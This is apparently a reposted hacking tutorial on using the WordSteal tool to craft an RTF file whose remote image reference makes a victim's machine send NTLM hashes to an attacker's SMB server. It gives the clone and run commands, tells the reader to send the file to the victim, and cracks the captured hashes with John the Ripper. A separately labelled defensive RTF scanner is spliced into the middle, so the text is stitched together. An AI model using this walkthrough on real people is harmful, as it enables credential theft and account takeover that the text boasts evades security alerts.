This script creates a proof of concept (POC) that steals NTLM hashes from a remote computer.
Microsoft Word can include images from remote locations. This is an undocumented feature, but malware authors have been seen using it to load images over HTTP for tracking statistics. A document can likewise reference a remote file on an SMB server, and the victim's machine then authenticates to that server with the victim's login credentials. This is very useful during a pentest because it lets you capture credentials without triggering any alerts, and most security products do not detect it.
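A defender-side check for the mechanism just described, added here as an example and not part of the original article or of the WordSteal tool: it reads an RTF document's field instructions and reports any target that points off-host (a UNC path on an SMB share, or an http/file URL) together with the host it would contact, which is what a mail gateway or attachment sandbox should flag. The RTF sample is constructed for the example, not the tool's real output.

```python
import re

# Constructed sample input (not WordSteal's output): a minimal RTF whose
# INCLUDEPICTURE field instruction points at a file on a UNC (SMB) path.
SAMPLE_RTF = r"""{\rtf1\ansi\deff0
{\field{\*\fldinst { INCLUDEPICTURE "\\\\192.0.2.10\\share\\1.jpg" }}{\fldrslt { }}}
\par }"""

# Field instructions live in \fldinst groups; the fields we care about are
# not nested, so capturing up to the group's closing brace is sufficient.
FLDINST_RE = re.compile(r"\\fldinst\s*\{?([^{}]*)\}?", re.IGNORECASE)
# Word field keywords that fetch external content, followed by a quoted target.
TARGET_RE = re.compile(r'\b(INCLUDEPICTURE|INCLUDETEXT|HYPERLINK|IMPORT)\b\s*"([^"]+)"',
                       re.IGNORECASE)


def unescape_rtf(s: str) -> str:
    """Turn RTF-escaped backslashes (two characters) back into single ones."""
    return s.replace("\\\\", "\\")


def classify(target: str) -> dict:
    """Classify a field target as UNC (SMB), URL or local, extracting the host."""
    t = unescape_rtf(target)
    if t.startswith("\\\\"):                       # \\host\share\file.jpg
        host = t[2:].split("\\", 1)[0]
        return {"kind": "unc", "host": host, "target": t}
    m = re.match(r"(?i)(https?|file)://([^/]+)", t)
    if m:
        return {"kind": "url", "host": m.group(2), "target": t}
    return {"kind": "local", "host": None, "target": t}


def scan_rtf(rtf: str) -> list:
    """Return every remote (UNC or URL) field target found in an RTF document."""
    findings = []
    for inst in FLDINST_RE.findall(rtf):
        for keyword, target in TARGET_RE.findall(inst):
            info = classify(target)
            if info["kind"] != "local":
                info["field"] = keyword.upper()
                findings.append(info)
    return findings


def is_suspicious(rtf: str) -> bool:
    """True when the document would make Word reach out to another host."""
    return bool(scan_rtf(rtf))


if __name__ == "__main__":
    for f in scan_rtf(SAMPLE_RTF):
        print(f"{f['field']} -> {f['kind']} host={f['host']} target={f['target']}")
```

Scanning attachments this way complements blocking outbound SMB (TCP 445) at the network edge, which stops the authentication attempt from ever reaching an external host.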
First, we need to download it from GitHub. Open a terminal in Kali Linux and enter the following command.
git clone https://github.com/0x090x0/WordSteal.git
Now open the downloaded WordSteal folder, where you will find the "main.py" Python script, and grant all permissions to the main.py script if needed.
chmod 777 main.py
As the author describes, this script wraps an image (say, a .jpg) in an .rtf file, which Microsoft Word opens. Rich Text Format is a proprietary document file format with a published specification, developed by Microsoft for cross-platform document exchange with Microsoft products. …
After that, download the image and save it in the WordSteal folder. Since I currently have a "1.jpg" image, we enter the following command, which generates an .rtf file that steals NTLM hashes from the remote computer.
python main.py 192.168.0.104 1.jpeg 1
The above command generates a .rtf file, as you can see in this screenshot; then send the 1.rtf file to the remote computer.
When the victim opens 1.rtf (like any Microsoft Word file) on their system, the attacker on the other side receives the NTLM hashes.
In WordSteal's output we have captured credentials without triggering any alerts, which you can observe in the following image. Now use the John the Ripper password-cracking tool to crack the hashes stored in the netntlmv2 password file by entering the following command:
john password_netntlmv2
We can see the victim's credentials, which can be used to log in.
Article credit - primetechie
Disclaimer
This content has been shared under Educational And Non-Profit Purposes Only.
Do not use this for illegal purposes.
The author and the site (Hacksnation.com) do not accept responsibility for any illegal action you take.